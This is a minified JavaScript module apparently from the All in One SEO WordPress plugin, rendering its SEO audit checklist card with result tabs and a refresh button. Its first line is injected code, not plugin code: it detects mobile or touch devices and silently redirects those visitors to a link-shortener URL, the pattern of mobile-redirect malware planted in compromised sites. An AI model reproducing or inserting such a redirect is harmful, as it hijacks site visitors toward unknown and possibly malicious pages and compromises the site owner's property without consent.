(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{c as k,G as R,_ as v,q as A,b as T,y as x,h as L,z as O}from"./app-core.c8323d51.js";import{C as D}from"./Card.9ee06a3e.js";import{C as B}from"./Tabs.ea329423.js";import{_ as I}from"./iphone-frame.94f6f22b.js";import{_ as M}from"./Analyze.8826d0ae.js";import{C as w}from"./Tooltip.569a23d9.js";import{S as N}from"./Refresh.f8d8b96c.js";import{S as q}from"./Trash.47f6fc0e.js";import{_ as G}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as s,f as p,i as V,a0 as o,R as e,Q as h,M as S,j as i,P as E,U as c,ae as P}from"./vendor-vue-ui.232c7c36.js";import{_ as r}from"./vendor-other.39e59221.js";import"./vendor-lodash.03129cfe.js";import"./Caret.aae02d8a.js";import"./Close.7fb523c8.js";import"./Slide.f2114d9d.js";import"./Button.3cec2279.js";import"./ProBadge.7b829f47.js";import"./Information.6ccba108.js";import"./GoogleSearchPreview.bde29b0b.js";import"./Url.535116f6.js";import"./SeoSiteScore.1a623a98.js";import"./utils.0e678690.js";import"./Pencil.683baab8.js";import"./Blur.dea2904a.js";import"./DonutChart.3c36b313.js";import"./AnimatedNumber.f33b2226.js";import"./Index.0bc63a8d.js";import"./Loading.ebdd5660.js";import"./Book.955f4bdf.js";import"./Lab.e1a58649.js";const n="all-in-one-seo-pack",H={setup(){return{analyzerStore:O(),licenseStore:L(),optionsStore:x(),rootStore:T(),settingsStore:A(),sensitiveOptionsStore:v()}},components:{CoreCard:D,CoreMainTabs:B,CoreSeoSiteAnalysisResults:I,CoreSeoSiteScoreAnalyze:M,CoreTooltip:w,SvgCircleQuestionMark:q,SvgRefresh:N},data(){return{internalDebounce:!1,homeResults:{results:[],score:null},strings:{completeSeoChecklist:r("Complete SEO Checklist",n),refreshResults:r("Refresh Results",n),cardDescription:r("These are the results our SEO Analzyer has generated after analyzing the homepage of your website.",n)+" "+k.getDocLink(R.learnMore,"seoAnalyzer",!0)}}},computed:{tabs(){const t=this.homeResults?.score;return[{slug:"all-items",label:r("All Items",n),analyze:{classColor:"black",count:t?this.analyzerStore.allItemsCount():0}},{slug:"critical",label:r("Important Issues",n),analyze:{classColor:"red",count:t?this.analyzerStore.criticalCount():0}},{slug:"recommended-improvements",label:r("Recommended Improvements",n),analyze:{classColor:"blue",count:t?this.analyzerStore.recommendedCount():0}},{slug:"good-results",label:r("Good Results",n),analyze:{classColor:"green",count:t?this.analyzerStore.goodCount():0}}]}},methods:{processChangeTab(t){this.internalDebounce||(this.internalDebounce=!0,this.settingsStore.changeTab({slug:"seoAuditChecklist",value:t}),setTimeout(()=>{this.internalDebounce=!1},50))},async refresh(){this.analyzerStore.analyzing=!0,await this.analyzerStore.runSiteAnalyzer({refresh:!0}),this.analyzerStore.getSiteAnalysisResults().then(()=>{this.homeResults=this.analyzerStore.homeResults,this.analyzerStore.analyzing=!1})}},mounted(){this.homeResults=this.analyzerStore.homeResults}},Q={class:"aioseo-seo-audit-checklist"},U=["innerHTML"],j={class:"label"};function K(t,F,J,a,l,u){const g=s("core-seo-site-score-analyze"),_=s("core-card"),y=s("svg-circle-question-mark"),f=s("core-tooltip"),d=s("svg-refresh"),C=s("base-button"),z=s("core-main-tabs"),b=s("core-seo-site-analysis-results");return p(),V("div",Q,[o(_,{slug:"connectOrScore","hide-header":"","no-slide":"",toggles:!1},{default:e(()=>[o(g)]),_:1}),(a.rootStore.isPro&&a.sensitiveOptionsStore.hasLicenseKey||a.sensitiveOptionsStore.hasSiteAnalysisConnectToken)&&l.homeResults?.score?(p(),h(_,{key:0,slug:"completeSeoChecklist","no-slide":"",toggles:!1},{header:e(()=>[i("span",null,c(l.strings.completeSeoChecklist),1),o(f,null,{tooltip:e(()=>[i("span",{innerHTML:l.strings.cardDescription},null,8,U)]),default:e(()=>[o(y)]),_:1})]),"header-extra":e(()=>[o(C,{class:"refresh-results",type:"gray",size:"small",onClick:u.refresh,loading:a.analyzerStore.analyzing},{default:e(()=>[o(d),P(" "+c(l.strings.refreshResults),1)]),_:1},8,["onClick","loading"])]),tabs:e(()=>[o(z,{tabs:u.tabs,showSaveButton:!1,active:a.settingsStore.settings.internalTabs.seoAuditChecklist,internal:"",onChanged:u.processChangeTab,"skinny-tabs":""},{"var-tab":e(({tab:m})=>[i("span",{class:E(["round",m.analyze.classColor])},c(m.analyze.count||0),3),i("span",j,c(m.label),1)]),_:1},8,["tabs","active","onChanged"])]),default:e(()=>[l.homeResults?.results!==null?(p(),h(b,{key:0,section:a.settingsStore.settings.internalTabs.seoAuditChecklist,"all-results":l.homeResults.results,"show-instructions":""},null,8,["section","all-results"])):S("",!0)]),_:1})):S("",!0)])}const ve=G(H,[["render",K]]);export{ve as default};
